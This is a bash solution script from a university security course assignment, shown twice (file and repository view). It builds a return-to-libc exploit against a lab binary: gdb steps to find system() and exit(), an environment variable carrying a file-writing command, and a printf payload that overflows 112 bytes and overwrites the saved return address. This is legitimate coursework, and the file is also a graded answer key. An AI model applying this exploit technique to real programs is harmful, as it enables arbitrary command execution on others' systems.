Systemsicherheit/Assignment 6 - Software Security - Teil 2/ret2libc/solution_grade.sh

#!/bin/bash

##### Exploit Creation Steps #####
###################################

# Step 1: Find the addresses of 'system' and 'exit' functions using gdb
# Commands:
#   p system -> 0xf7e15360
#   p exit -> 0xf7e07ec0

# Step 2: Export an environment variable to inject our command as a string into the ret2libc executable
# Command: export COMMAND="echo 100 > /home/user/t0p_s3cr3t/owned"

# Step 3: Find the address of the environment variable string in memory using gdb
# Command: x/s *((char **)environ+16) (17th env. variable)
# Add 8 to the address to skip the 'COMMAND=' part
#   -> 0xffffdeda (0xffffdee8 in gdb; different env. vars when executing ./ret2libc directly; found by trial and error)
###################################

############ Exploit ##############
# Fill the buffer with 'A's until the stored EIP is reached
printf "A%.0s" {1..112}

# Overwrite the stored EIP with the address of the 'system' function
# Place the address of the 'exit' function as the return address for 'system'
# Provide the argument for 'system', which is the address of the value of the environment variable COMMAND
# All addresses are in little-endian format
printf "\x60\x53\xe1\xf7\xc0\x7e\xe0\xf7\xda\xde\xff\xff"
###################################
[Assignment-6] solution task 8 (return-to-libc) 2024-06-14 16:01:04 +02:00			`#!/bin/bash`

			`##### Exploit Creation Steps #####`
			`###################################`

			`# Step 1: Find the addresses of 'system' and 'exit' functions using gdb`
			`# Commands:`
			`# p system -> 0xf7e15360`
			`# p exit -> 0xf7e07ec0`

			`# Step 2: Export an environment variable to inject our command as a string into the ret2libc executable`
			`# Command: export COMMAND="echo 100 > /home/user/t0p_s3cr3t/owned"`

			`# Step 3: Find the address of the environment variable string in memory using gdb`
			`# Command: x/s ((char *)environ+16) (17th env. variable)`
			`# Add 8 to the address to skip the 'COMMAND=' part`
			`# -> 0xffffdeda (0xffffdee8 in gdb; different env. vars when executing ./ret2libc directly; found by trial and error)`
			`###################################`

			`############ Exploit ##############`
			`# Fill the buffer with 'A's until the stored EIP is reached`
			`printf "A%.0s" {1..112}`

			`# Overwrite the stored EIP with the address of the 'system' function`
			`# Place the address of the 'exit' function as the return address for 'system'`
			`# Provide the argument for 'system', which is the address of the value of the environment variable COMMAND`
			`# All addresses are in little-endian format`
			`printf "\x60\x53\xe1\xf7\xc0\x7e\xe0\xf7\xda\xde\xff\xff"`
			`###################################`